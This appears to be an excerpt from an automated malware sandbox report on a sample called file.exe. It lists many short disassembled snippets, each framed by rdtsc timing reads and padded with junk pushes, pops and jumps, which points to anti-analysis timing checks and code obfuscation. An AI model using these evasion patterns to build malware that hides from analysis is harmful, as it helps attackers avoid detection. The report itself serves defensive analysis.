Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C5B1 second address: C6C5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE0491DA106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C6ED second address: C6C6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C71FFC second address: C72014 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0491DA10Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FE0491DA106h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7216D second address: C72171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C72171 second address: C72177 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C725A4 second address: C725B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE048D0589Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C725B7 second address: C725E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FE0491DA11Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C73143 second address: C73147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C73147 second address: C7314D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7314D second address: C73174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE048D058A9h 0x0000000b jng 00007FE048D058A2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C736EF second address: C73720 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0491DA119h 0x00000008 jmp 00007FE0491DA10Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007FE0491DA10Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C73A19 second address: C73A55 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE048D058AEh 0x00000008 pushad 0x00000009 jmp 00007FE048D058A9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C73CF8 second address: C73CFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C73CFD second address: C73D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C73D0C second address: C73D17 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FE0491DA106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7554B second address: C75551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75551 second address: C75571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE0491DA106h 0x0000000a jmp 00007FE0491DA116h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75571 second address: C75575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75575 second address: C7558B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FE0491DA128h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FE0491DA106h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7558B second address: C7559B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FE048D05896h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E8B2 second address: C7E8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E8B8 second address: C7E8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E8BC second address: C7E8D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA112h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E8D9 second address: C7E8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE048D0589Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7DCB2 second address: C7DCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE0491DA106h 0x0000000a jmp 00007FE0491DA117h 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7DCDA second address: C7DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7DE2D second address: C7DE5E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0491DA106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FE0491DA117h 0x00000012 jc 00007FE0491DA106h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7DFB7 second address: C7DFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E479 second address: C7E489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA10Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C87B4C second address: C87B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E4C second address: C85E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E61 second address: C85E83 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FE048D0589Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FE048D0589Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E83 second address: C85E88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E88 second address: C85E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007FE048D058A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E95 second address: C85E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8616B second address: C86175 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE048D0589Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86175 second address: C86183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86183 second address: C86187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86187 second address: C86193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FE0491DA106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86193 second address: C8619D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE048D0589Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8619D second address: C861A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C861A5 second address: C861AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C861AB second address: C861B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8643A second address: C86444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C865F0 second address: C865F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C865F4 second address: C865F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C865F8 second address: C86653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE0491DA106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FE0491DA117h 0x00000012 jnp 00007FE0491DA119h 0x00000018 jmp 00007FE0491DA113h 0x0000001d pushad 0x0000001e jmp 00007FE0491DA119h 0x00000023 push esi 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C867B2 second address: C867B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C867B6 second address: C867CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C867CB second address: C867D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86944 second address: C86948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86A96 second address: C86A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C87339 second address: C8733E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8733E second address: C87365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE048D058A9h 0x00000009 jmp 00007FE048D0589Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C879F5 second address: C87A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE0491DA10Bh 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE0491DA119h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C87A23 second address: C87A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8D80A second address: C8D837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FE0491DA106h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007FE0491DA119h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8EE18 second address: C8EE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8EE1C second address: C8EE20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8EE20 second address: C8EE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9CE6D second address: C9CE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9CE85 second address: C9CE89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EA3F second address: C9EA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EA45 second address: C9EA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EA4B second address: C9EA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EA4F second address: C9EA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EA53 second address: C9EA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FE0491DA115h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EA72 second address: C9EAA2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE048D05896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FE048D0589Eh 0x00000012 push esi 0x00000013 jmp 00007FE048D058A2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0E14 second address: CA0E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0E1E second address: CA0E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0E23 second address: CA0E3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FE0491DA115h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0E3F second address: CA0E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FE048D058B0h 0x0000000b jmp 00007FE048D058A8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0E6C second address: CA0E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0E72 second address: CA0E7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2DB9 second address: CA2DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007FE0491DA106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FE0491DA112h 0x00000012 jnl 00007FE0491DA106h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2DD3 second address: CA2DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2DDD second address: CA2DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE0491DA106h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2DEA second address: CA2DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA923C second address: CA9242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA9242 second address: CA924B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB4DE second address: CBB4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB4E2 second address: CBB4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB4EB second address: CBB52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE0491DA106h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d jnc 00007FE0491DA10Eh 0x00000013 pushad 0x00000014 jmp 00007FE0491DA119h 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c popad 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB52A second address: CBB530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB530 second address: CBB54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA119h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB6CF second address: CBB6D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB6D3 second address: CBB6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB6DF second address: CBB6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB9E6 second address: CBB9F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB9F9 second address: CBBA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBBA07 second address: CBBA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBC8A8 second address: CBC8AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBC8AE second address: CBC8B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1A2C second address: CC1A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1623 second address: CC1632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1761 second address: CC17A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jnp 00007FE048D058ABh 0x0000000d jmp 00007FE048D058A5h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007FE048D05896h 0x0000001a jmp 00007FE048D058A5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA7B4 second address: CCA7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007FE0491DA106h 0x0000000c jns 00007FE0491DA106h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA7CD second address: CCA7E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA7E4 second address: CCA7EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA7EA second address: CCA7EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA567 second address: BDA581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA115h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE015A second address: CE015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE015E second address: CE0168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE6AEA second address: CE6B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
